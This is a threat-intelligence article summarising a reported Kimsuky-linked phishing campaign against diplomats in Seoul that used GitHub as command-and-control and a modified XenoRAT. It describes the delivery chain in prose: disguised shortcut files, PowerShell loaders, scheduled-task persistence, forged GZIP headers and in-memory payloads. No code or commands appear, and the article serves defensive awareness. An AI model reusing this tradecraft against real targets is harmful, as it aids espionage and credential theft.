Inside Kimsuky’s GitHub-Powered Cyber-Espionage Campaign

At the beginning of 2025, Trellix specialists uncovered a sweeping cyber-espionage campaign targeting diplomatic missions in Seoul. Between March and July, at least nineteen phishing attacks were recorded, in which North Korean–linked actors impersonated diplomats and distributed convincing invitations to meetings, official letters, and event notifications.

The campaign’s most notable feature was its use of GitHub as a covert command-and-control channel for compromised systems. Malicious payloads were delivered through cloud services such as Dropbox and Daum, while the attackers’ primary weapon was a customized variant of the XenoRAT remote administration tool, granting them full control over victims’ workstations and enabling extensive intelligence collection. Infrastructure analysis confirmed a direct connection to the activities of Kimsuky, long notorious for its espionage operations on behalf of North Korea.

The attack unfolded in multiple stages. Initially, embassy staff received password-protected archives presented as measures of confidentiality. Inside was a shortcut file bearing a double extension and the icon of a PDF document. When executed, this file triggered a PowerShell script that fetched a payload from GitHub and established persistence via scheduled tasks. The malware then harvested system information and exfiltrated it through the GitHub API. To avoid detection, the attackers disguised their activity within ordinary HTTPS traffic to GitHub domains.

Particular attention should be paid to the method of retrieving the final payload. After being downloaded from Dropbox, the file carried a falsified GZIP header, masquerading as a harmless document. The script corrected the header bytes and decompressed the malicious code directly into memory. The last stage involved activating XenoRAT, equipped with stealth capabilities, credential theft modules, keystroke logging, screen and camera capture, and full file management.

The phishing waves followed a deliberate rhythm. March 2025 saw initial test runs with neutral subject lines. By May, the operation reached its peak: diplomats received invitations to “political meetings” and U.S. Independence Day celebrations. Later that month, attackers impersonated editors of a fictitious Diplomacy Journal, soliciting interview requests. In June and July, lures shifted toward military and bilateral relations, with the final attack observed on July 28 in an email posing as correspondence from the Polish ambassador.

To strengthen credibility, operators crafted over fifty counterfeit documents in multiple languages, including Korean, English, Persian, Arabic, French, and Russian. These decoys ranged from conference invitations and official notes to admission forms for international schools. Most contained no malware, serving instead as persuasive distractions to convince recipients of the authenticity of the correspondence.

The infrastructure relied on several GitHub accounts (“blairity,” “landjhon”) hosting dozens of repositories with thematic names. Email delivery leveraged Korean services Hanmail and Daum, alongside VPS nodes located in Seoul. Forensic analysis revealed that the adversaries operated within isolated virtual environments running Windows 11 and Server 2022, employed developer toolchains, and monitored processes using native Windows utilities.

According to Trellix, both the choice of targets and the technical tradecraft point directly to Kimsuky. However, pauses in activity aligned with Chinese holidays, and working hours coincided with standard office schedules in China’s time zone. This raises the possibility that parts of the operation were conducted from Chinese territory or with Chinese resources, even though the motivations and toolset remain consistent with North Korean origins.

In sum, this campaign exemplifies the core pillars of modern cyber-espionage: leveraging trusted platforms as covert channels, deploying sophisticated social engineering, and employing multi-layered malware delivery techniques. It remains active and demands heightened vigilance from diplomatic missions and government agencies worldwide.